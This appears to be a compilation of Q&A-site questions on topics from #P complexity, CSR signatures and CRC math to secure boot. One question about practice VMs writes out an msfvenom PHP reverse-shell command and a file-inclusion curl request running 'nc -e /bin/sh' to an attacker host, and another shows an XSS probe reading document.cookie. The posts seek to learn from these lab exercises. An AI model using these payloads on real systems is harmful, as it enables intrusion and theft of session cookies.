## Understanding definition of #P [migrated]

Valiant defined $$\#P$$ in terms of a counting TM, which is a NTM that outputs the number of solutions [1].

I am a bit stuck with the following two questions: Let’s say I have a decision problem $$X$$, the corresponding counting problem $$\#X$$, and an enumeration algorithm $$E$$ that enumerates the solutions of $$X$$ in polynomial output complexity.

1. If $$w$$ is a witness for $$X$$ that I can verify in polynomial time, does this imply that $$\#X$$ is in $$\#P$$?
2. Does the existence of $$E$$ imply that $$\#X$$ is in $$\#P$$?

For both questions, I think the answer is yes because they imply that there is a NTM which could be modified to count the number of witnesses. However, I feel like I cannot argue this properly and that I might miss something.

[1] Leslie G. Valiant: The Complexity of Computing the Permanent. Theor. Comput. Sci. 8: 189-201 (1979)

## Help understanding CSR fields

I’ve made a CSR (Certificate Signing Request) in order to understand better how a PKI could be made and how it works. Using the following commands

openssl req -new -newkey rsa:1024 -nodes -out ca.csr -keyout ca.key openssl req -text -noout -verify -in ca.csr 

I obtain the following output

Certificate Request:     Data:         Version: 1 (0x0)         Subject: C = ca, ST = Some-State, O = Internet Widgits Pty Ltd         Subject Public Key Info:             Public Key Algorithm: rsaEncryption                 RSA Public-Key: (1024 bit)                 Modulus:                     00:c2:ac:2f:7b:17:93:1c:39:07:aa:cf:8d:fd:b7:                     2e:f4:90:76:16:d8:cf:cb:1b:02:ec:56:3d:ff:5e:                     a2:fb:9e:8b:af:9b:3b:f8:27:4e:82:39:aa:6d:90:                     e6:52:71:16:0d:f4:e0:fe:eb:50:31:79:3d:09:8a:                     49:c0:b4:cb:1e:50:55:83:5f:81:58:46:03:1a:8a:                     cf:22:56:2c:5f:30:ce:1f:cd:39:19:b4:4c:d4:8b:                     c8:27:b2:34:62:31:e9:d2:b0:7c:f6:50:7a:12:f4:                     1a:20:53:53:fb:46:ba:0b:b5:16:aa:ed:2d:0f:79:                     eb:a2:7c:65:d1:3d:d1:74:87                 Exponent: 65537 (0x10001)         Attributes:             a0:00     Signature Algorithm: sha256WithRSAEncryption          4f:d7:d9:f5:fe:87:7c:fb:2d:e4:50:28:4d:b5:7a:5c:4f:87:          f6:7a:83:59:2a:76:33:12:61:bf:c5:0d:5f:c8:41:d5:ec:b1:          ed:01:21:98:b5:ab:3f:c0:12:78:aa:8e:c8:95:fd:e9:10:e7:          69:8c:c3:e5:56:3d:f2:c8:b2:bb:5d:88:3f:5e:f8:f0:6b:e9:          2c:ea:92:cb:90:60:3b:57:e7:09:6a:70:38:d1:43:0f:e6:72:          31:99:a6:03:c4:3e:21:41:61:61:07:57:72:2a:41:ed:85:3c:          d0:58:02:1c:81:ee:09:3c:39:02:21:fb:9b:25:4a:84:97:1b:          c2:b6 

What is not clear to me is the bytes after the "Signature Algorithm" field:

1. How they are calculated?
2. Which key is used?
3. Which fields of ca.csr are signed?
4. Is it possibile to extract the signature and decode it (e.g. using openSSL)?

After the csr creation I use the following commands to create an x509 self signed certificate

openssl x509 -trustout -signkey ca.key -req -in ca.csr -out ca.pem openssl x509 -text -noout  -in ca.pem 

Output below

Certificate:     Data:         Version: 1 (0x0)         Serial Number:             36:e9:c2:ae:ed:b2:a6:a2:00:7a:16:33:19:b8:57:a8:d8:c6:09:af         Signature Algorithm: sha256WithRSAEncryption         Issuer: C = ca, ST = Some-State, O = Internet Widgits Pty Ltd         Validity             Not Before: Jul  7 12:16:26 2020 GMT             Not After : Aug  6 12:16:26 2020 GMT         Subject: C = ca, ST = Some-State, O = Internet Widgits Pty Ltd         Subject Public Key Info:             Public Key Algorithm: rsaEncryption                 RSA Public-Key: (1024 bit)                 Modulus:                     00:c2:ac:2f:7b:17:93:1c:39:07:aa:cf:8d:fd:b7:                     2e:f4:90:76:16:d8:cf:cb:1b:02:ec:56:3d:ff:5e:                     a2:fb:9e:8b:af:9b:3b:f8:27:4e:82:39:aa:6d:90:                     e6:52:71:16:0d:f4:e0:fe:eb:50:31:79:3d:09:8a:                     49:c0:b4:cb:1e:50:55:83:5f:81:58:46:03:1a:8a:                     cf:22:56:2c:5f:30:ce:1f:cd:39:19:b4:4c:d4:8b:                     c8:27:b2:34:62:31:e9:d2:b0:7c:f6:50:7a:12:f4:                     1a:20:53:53:fb:46:ba:0b:b5:16:aa:ed:2d:0f:79:                     eb:a2:7c:65:d1:3d:d1:74:87                 Exponent: 65537 (0x10001)     Signature Algorithm: sha256WithRSAEncryption          a4:91:01:17:9a:da:fe:45:5e:8d:08:1d:12:1f:63:22:81:b0:          b5:cd:93:02:86:35:2e:e5:b4:17:6b:56:a2:f8:51:7b:98:8b:          7d:ea:e1:16:0f:97:0c:e4:de:8f:1d:b1:d1:5b:97:aa:7a:07:          58:db:cc:26:2f:21:f8:cc:f3:94:f9:9a:95:a3:ad:8e:53:a5:          25:62:49:47:bf:a4:40:10:59:dd:f3:96:02:1c:d3:a9:04:82:          ae:7d:c9:4a:27:7b:b3:41:7b:a0:35:54:79:48:dd:34:08:8a:          dc:5e:dd:31:2c:67:9b:fb:84:b7:8c:81:9e:16:bf:4f:ab:43:          e7:6f 

In this case I have the same questions as above: due to be a self-signed certificate, why the signature is changed respect to the csr file?

## Understanding $\lambda \mu$-calculus in more programming way

I am learning $$\lambda \mu$$-calculus (self-study).

I learned it because it seems very useful for understanding Curry-Howard correspondence (e.g understanding the connection between classical logic and intuitionistic logic)

I searched the internet, there is some information about $$\lambda \mu$$-calculus on Wikipedia, but it does not explore it further (at time of writing). https://en.wikipedia.org/wiki/Lambda-mu_calculus

Is there any more programming way to interpret the intuition behind $$\lambda \mu$$-calculus?

For example:

In $$\lambda \mu$$-calculus, there are two additional terms called $$\mu$$-abstraction $$\mu \delta .T$$ and named term $$[\delta]T$$.

Can I think $$\mu$$-abstraction as a $$\lambda$$-abstraction which waiting for some continuation $$k$$ (here, is $$\delta$$)?

What’s the meaning of the named term?

How does it connect to call/cc?

Can I find the corresponding roles in some programming language (e.g. Scheme)?

PS: I can understand $$\lambda$$-calculus, call/cc in Scheme, and CPS-Translation, but I still cannot clearly understand the intuition behind $$\lambda \mu$$-calculus.

Very thanks.

## Understanding a CRC32 Implementation

I’m currently trying to understand an implementation of CRC32 about which I have a question.

public uint Compute_CRC32_Simple(byte[] bytes) {     const uint polynomial = 0x04C11DB7; /* divisor is 32bit */     uint crc = 0; /* CRC value is 32bit */      foreach (byte b in bytes)     {         crc ^= (uint)(b << 24); /* move byte into MSB of 32bit CRC */          for (int i = 0; i < 8; i++)         {             if ((crc & 0x80000000) != 0) /* test for MSB = bit 31 */             {                 crc = (uint)((crc << 1) ^ polynomial);             }             else             {                 crc <<= 1;             }         }     }      return crc; } 

I’m particularly interested in understanding this line: crc ^= (uint)(b << 24); /* move byte into MSB of 32bit CRC */

What are the mathematics that make this line possible, both the shifting of the current byte (turned into an int) by 24 and the following XOR with the current crc? Unfortunately, the author doesn’t go into detail regarding this.

## Uniform Hashing. Understanding space occupancy and choice of functions

I’m having troubles understanding two things from some notes about Uniform Hashing. Here’s the copy-pasted part of the notes:

Let us first argue by a counting argument why the uniformity property, we required to good hash functions, is computationally hard to guarantee. Recall that we are interested in hash functions which map keys in $$U$$ to integers in $$\{0, 1, …, m-1\}$$. The total number of such hash functions is $$m^{|U|}$$, given that each key among the $$|U|$$ ones can be mapped into $$m$$ slots of the hash table. In order to guarantee uniform distribution of the keys and independence among them, our hash function should be anyone of those ones. But, in this case, its representation would need $$\Omega(log_2 m^{|U|}) = \Omega(|U| log_2 m)$$ bits, which is really too much in terms of space occupancy and in the terms of computing time (i.e. it would take at least $$\Omega(\frac{|U|log_2 m}{log_2 |U|})$$ time to just read the hash encoding).

The part I put in bold is the first thing is confusing me.

Why the function should be any one of those? Shouldn’t you avoid a good part of them, like the ones sending every element from the universe $$U$$ into the same number and thus not distributing the elements?

The second thing is the last "$$\Omega$$". Why would it take $$\Omega(\frac{|U|log_2 m}{log_2 |U|})$$ time just to read the hash encoding?

The numerator is the number of bits needed to index every hash function in the space of such functions, the denominator is the size in bits of a key. Why this ratio gives a lower bound on the time needed to read the encoding? And what hash encoding?

## Understanding CRC Computation with PCLMULQDQ

I am currently reading this paper which shows how to calculate CRC using the instruction PCLMULQDQ. I don’t quite understand the equations in it yet.

1. Starting with this one for the definition of crc32:

CRC (M (x)) = xdeg(P(x)) • M(x) mod P(x)

Before reading this paper, I had only ever seen CRC (M (x)) = M(x) mod P (x). Why can xdeg(P(x)) be multiplied with M(x) (and still =CRC) and why do they do it?

1. M(x) = D(x) • x^T xor G(x).

Again I do not understand how they derived this equation?

1. I also don’t understand why they are using multiplication at all (although this might become clear once I understand 1) and 2).

All CRC implementations I’ve seen so far are basically divisions with or without precomputed values so why do they use multiplication?

In addition, I’d also be very thankful to be pointed towards resources that could help me derive these equations myself in the future.

EDIT: Ive managed to derive 2). Any bitstring M representing a polynomial can be cut into two smaller bitstrings A and B. To add them back together to create M you have to multiply A by x to the power of the number of digits(=T) in B, thereby appending T zeros to the right end of A. Once you’ve done this, you can xor (add in galois field) the two back together, creating M. E.g. M = 10101, A = 101 B = 01 => T = 2; A * x^T = 10100. Xor with B = 10100 xor 01 = 10101 = M

EDIT2: typos

## Help Understanding PHP Reverse Shells

I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.

For Fristileaks 1.3, it was simple. I was able to get login credentials to the website and upload a php reverse shell. I used msfvenom for the script:

msfvenom -p php/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx -f raw > shell.php  

I had to rename the script from shell.php to shell.php.png because the site only let me upload pictures. Once I uploaded the script, I found the url for the picture/script, set up a netcat listener on my attacking machine, and then visited the page with the script and that was enough to establish a connection between the target and attacker.

It was much more difficult to establish a connection on the Pwnlab Init VM.

What I had to do, ultimately, was upload a php backdoor script:

(/usr/share/webshells/php/simple-backdoor.php) 

Then, I had to exploit the below vulnerability on the index.php page, which allows for injection into the lang cookie

if (isset($_COOKIE['lang'])) { include("lang/".$  _COOKIE['lang']); } 

I then used the below curl query to pass the page with the uploaded php backdoor to the lang variable, and then netcat to my attacking machine, which I had already set to listen for a connection

curl --output - -b lang=../upload/6a8c0c37efded4d620a5c59990f07b90.png http://xxx.xxx.xxx.xxx/index.php?cmd=/bin/nc+-e+/bin/sh+xxx.xxx.xxx.xxx+xxxx 

Can anybody shed any light on why it was so easy to establish a reverse shell in one instance and more involved in another? What is going on behind the scenes in the Pwnlab VM such that visiting the URL with the uploaded reverse shell script does not work, but exploiting the lang variable with a PHP backdoor is sufficient?

I suppose you just need to have a lot of tools at your disposal and keep trying until something works, but it would help to have a concept of why one approach works and another doesn’t.

## Reflected XSS in form action – understanding

I am trying to learn basics of web security vulnerabilities.

I have found a website, where on reset password, you get a link in the email with a token, and when you click this link, the webpage opens and the url is reflected in a form action. Something like this:

password reset url: https://target.com/token=q123sefgetrt3dfe

and this is how it is reflected:

<form action="https://target.com/toekn=q123sefgetrt3dfe" method="post"> 

Based on this, i am trying to figure out if this can lead to reflected XSS. So in the url i tried something like this:

https://target.com/token=q123sefgetrt3dfe"/><script>alert(document.cookie)</script> 

so that the form tag is closed, and a script is inserted inside the form.

This reflects in the form action, but with url encoded, so quotes are turned to %22 and angular brackets to %3E.

Does this mean that reflected xss can’t be achieved here? is the browser encoding this , or the web page itself must be encoding this ? is there a way to bypass to see if there is a vulnerability?

## Understanding Secure Boot

I’m trying to understand the secure boot process of an OS but there are few points I can’t wrap my head around.

At a high level, afaik, secure boot ensures that the loaded OS is authenticated by its respective vendor. If an adversary modifies the OS code, the authentication checks during secure boot fails and user is notified.

What I want to understand is how’s this mechanism implemented at a low level. My understanding is as follows.

There’s a read-only memory (ROM) where the program which initiates the booting process is written along with a public key by the manufacturer. Integrity of this code is basically implicitly trusted, so this program is basically the root-of-trust. This program is loaded by CPU first and upon execution, it verifies and loads the next component in the booting process. Next component verifies the next next component and so on until all the components of OS are loaded.

However, what ensures that CPU really starts booting the system from the correct ROM? Can’t an adversary force the CPU to read a malicious initiating program that disregards the verification step? That is, there should be another component that ensures the system really starts from the root-of-trust program. What’s that component or is my understanding of the process is incorrect?